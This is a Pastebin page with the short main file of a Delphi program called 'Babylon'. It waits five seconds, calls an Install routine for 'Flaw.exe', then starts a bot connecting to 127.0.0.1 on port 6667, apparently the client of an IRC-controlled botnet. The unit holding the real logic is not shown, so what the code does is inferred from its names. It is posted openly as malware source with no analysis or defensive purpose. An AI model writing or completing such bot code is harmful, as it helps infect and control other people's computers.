Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- program Babylon;
- uses
- Windows,
- Unit1 in 'Unit1.pas';
- begin
- Sleep(5000);
- Install('Flaw.exe', 'Flaw-Version-1.0');
- StartBot('127.0.0.1', 6667);
- end.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement